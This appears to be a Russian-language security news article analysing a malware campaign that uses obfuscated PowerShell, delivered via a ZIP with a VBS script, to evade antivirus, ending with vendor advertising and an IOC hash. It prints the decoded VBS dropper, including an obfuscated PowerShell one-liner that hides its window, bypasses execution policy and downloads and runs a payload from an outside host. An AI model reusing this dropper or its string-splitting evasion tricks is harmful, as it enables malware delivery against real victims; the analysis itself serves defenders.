Исследователи обнаружили новый образец вредоносной программы, который использует различную технику обфустации (запутывания кода) для изменения общей подписи при ее доставке конечныым пейлоад, чтобы обойти большую части антивирусных продуктов.
Злоумышленники, изменяющие метод обфустации (запутывания кода), настраивают конечный пейлоад, чтобы настроить способ доставки, который является эффективным методом для достижения цели успешно, не подвергаясь риску быть обнаруженным антивирусной программой.
Поскольку многие антивирусные продукты полагаются на обнаружение на основе сигнатур (подписей), злоумышленники продолжают изменять общую структуру вредоносного программного обеспечения, не изменяя его функции и создавая слой, чтобы избежать обнаружения антивирусом.
Следующий метод, в основном, использует обфускацию для обработки исполнителей таким образом, чтобы избежать обнаружения антивирусом.
- Упаковщик, которые сжимают или «пакетируют» вредоносную программу
- Crypters, которые шифруют вредоносную программу (или ее части)
- Другие обфускаторы, которые видоизменяют, но не делают её нейтральной — вредоносную программу различными способами, тем самым изменяя общее количество байтов в программе.
Как работает это вредоносное программное обеспечение
Исследователи сталкиваются с новым вредоносным файлом, использующим метод обфускации (запутывания кода) PowerShell, который распространяется через ZIP-файл, содержащий VBS Script и PDF документ.
VB скрипт с использованием принципов кодирования Base64 для обфускации первого слоя, загрузит файл “hxxps://ravigel[dot]com/1cr[dot]dat” via PowerShell Script.
Function GetTimeZoneOffset()
Const sComputer = “.”
Dim oWmiService : Set oWmiService = _
GetObject(“winmgmts:{impersonationLevel=impersonate}!\\” _
& sComputer & “\root\cimv2”)
Dim cTimeZone : Set cTimeZone = _
oWmiService.ExecQuery(“Select * from Win32_TimeZone”)
Dim oTimeZone
For Each oTimeZone in cTimeZone
GetTimeZoneOffset = oTimeZone.Bias / 60
Exit For
Next
End Function
Set vertu = CreateObject(“WScript.Shell”)
vk2=”erS”
if GetTimeZoneOffset = 9 then
Dim humm
humm=”office”
tss1=”Pow”
okol=”ss -c”
nop3=”heLl”
mur=”le hid”
vertu.Run(tss1+vk2+nop3+” -windowsty”+mur+”den -noexit -executionpolicy bypa”+okol+”ommand I`EX ((neW`-Obj`EcT ((‘Net’+’.’+’Webc’+’lient’))).((‘Downloadst’+’ri’+’ng’)).InVokE(((‘ht”+”tp:’+’/”+”/r’+’av’+’ig’+’el.com/1’+’cr.’+’da’+’t’)))) “)
Set vertu = Nothing
WScript.Quit
else
top=1
end if
VBS Script Decoded
В соответствии cylance, многочисленные методы, такие как разделение строк по конкатенации и присвоению переменных, а также использование меток « » и случайных заглавных букв, используются для разделения слов или подписей, на которые обычно полагаются антивирусные компании, для идентификации вредоносных PowerShell.
Исследователи сказали: «Файл 1cr.dat — это то место, где все стало довольно интересным», «Он использует метод строкового шифрования, свойственный C #, называемый SecureString … обычно используемый для шифрования чувствительных строк в приложениях с использованием встроенного DPAPI от Microsoft».
Позже появляется набор инструкций, чтобы попытаться победить автоматические методы песочницы, а другой PE-файл «top.tab» будет загружен с использованием существующего скрипта, а конечный пейлоад будет введен в машину жертвы.
Во время анализа файл был обнаружен только тремя продуктами.
Пейлоад представляет собой простой инструмент шпионажа, широко известный сообществу безопасности. Исследователи считают, что он являет собой вредоносное программное обеспечение.
Методы смягчения последствий действия продвинутого вредоносного программного обеспечения
Ознакомьтесь с лучшим планом смягчения и защиты для организации, которая не может позволить себе время простоя. Он включает в себя полную защиту от DDoS, расширенные решения безопасности, высокую доступность и SLA 99.999%, веб-сайты, нуждающиеся в защите от хакеров и вредоносных ботов.
Если вредоносная программа уже была загружена на зараженный сервер, можно заблокировать связь между злоумышленником и бэкдором, что остановит работу бэкдора и предупредит администратора сервера, чтобы можно было удалить вредоносное программное обеспечение.
Размещение брандмауэра веб-приложений может отфильтровывать вредоносную оболочку Backdoor и изолировать дальнейшую атаку.
Внедрите рекомендуемую защиту Imperva Incapsula backdoor shell.
Защитите свои веб-приложения от уязвимостей с помощью лучших в мире решений WAF
IOC:
50e7fe23731ad94f1714c1a8acfce3f8b6e6e918b3e3aa1daa7275cb6052e68c
Источник: ;